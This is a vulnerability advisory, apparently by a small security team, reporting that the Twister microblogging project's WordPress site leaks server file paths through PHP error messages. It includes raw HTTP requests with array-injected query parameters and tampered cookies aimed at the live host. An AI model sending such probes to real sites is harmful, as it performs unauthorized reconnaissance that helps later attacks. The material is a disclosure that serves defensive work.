======================================================================== TWISTER Peer-To-Peer microblogging Multiples Application Error Message ( and disclosing sensitive information) ======================================================================== TIME-LINE VULNERABILITY Multiples Advisories but Not Response Not Fixed ----------------- Alerts summary ----------------- Application error message ********************** / author cat comment_author_email_46104838c3366e1644fd983230bdf8c5 comment_author_url_46104838c3366e1644fd983230bdf8c5 feed m s wordpress_46104838c3366e1644fd983230bdf8c5 wordpress_logged_in_46104838c3366e1644fd983230bdf8c5 /wp-comments-post.php author comment email url /wp-login.php comment_author_email_46104838c3366e1644fd983230bdf8c5 comment_author_url_46104838c3366e1644fd983230bdf8c5 redirect_to user_email user_login wordpress_46104838c3366e1644fd983230bdf8c5 wordpress_logged_in_46104838c3366e1644fd983230bdf8c5 I. VULNERABILITY ------------------------- #Title: TWISTER.NET Multiples Application Error Message ( disclose sensitive information) #Vendor:http://www.twister.net.co #Author:Juan Carlos García (@secnight) #Verified: Francisco Moraga (@BTShell) #http://asap-sec.com II. DESCRIPTION ------------------------- Twister Peer-to-peer microblogging is the fully decentralized P2P microblogging platform leveraging from the free software implementations of Bitcoin and BitTorrent protocols. III. PROOF OF CONCEPT ------------------------- --Attack details--- Application error message ------------------------- Vulnerability description ************************* This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception. Affected items --------------- / /wp-comments-post.php /wp-login.php Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst Error message found: Warning: trim() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/plugin.php on line 199
URL encoded GET input author was set to 1 Error message found: Warning: urldecode() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/query.php on line 2519
GET /?author[$secnight]=1&feed=rss2 HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ X-Pingback: http://twister.net.co/xmlrpc.php Host: twister.net.co Connection: Keep-alive Accept-Encoding: gzip,deflate URL encoded GET input cat was set to 1 Error message found: Warning: urldecode() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/query.php on line 1771
GET /?cat[$secnight]=1 HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ Host: twister.net.co Connection: Keep-alive Accept-Encoding: gzip,deflate Cookie input comment_author_url_46104838c3366e1644fd983230bdf8c5 was set to http%3A%2F%2F1 Error message found: Warning: strip_tags() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/formatting.php on line 3261
GET / HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ Referer: http://twister.net.co:80/ Host: twister.net.co Connection: Keep-alive Accept-Encoding: gzip,deflate URL encoded GET input feed was set to 1 Error message found: Warning: strpos() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/class-wp.php on line 331
GET /?author=1&feed[$secnight]=1 HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ Host: twister.net.co Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst Error message found: Warning: trim() expects parameter 1 to be string, array given in /home/content/68/11448068/html/wp-includes/plugin.php on line 199
GET /wp-login.php HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5[]=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ Referer: http://twister.net.co:80/ Host: twister.net.co Etc Etc Etc . . . IV. BUSINESS IMPACT ------------------------- The impact of this vulnerability: The error messages disclose sensitive information. This information can be used to launch further attacks. V SOLUTION ------------------------ Pentesting, Review and Write Secure Code. VI. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García(@secnight) Verified by Francisco Moraga (@BTShell) ASAP-SEC Team Members Security As Soon As Possible (@Asap_Sec) VII. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.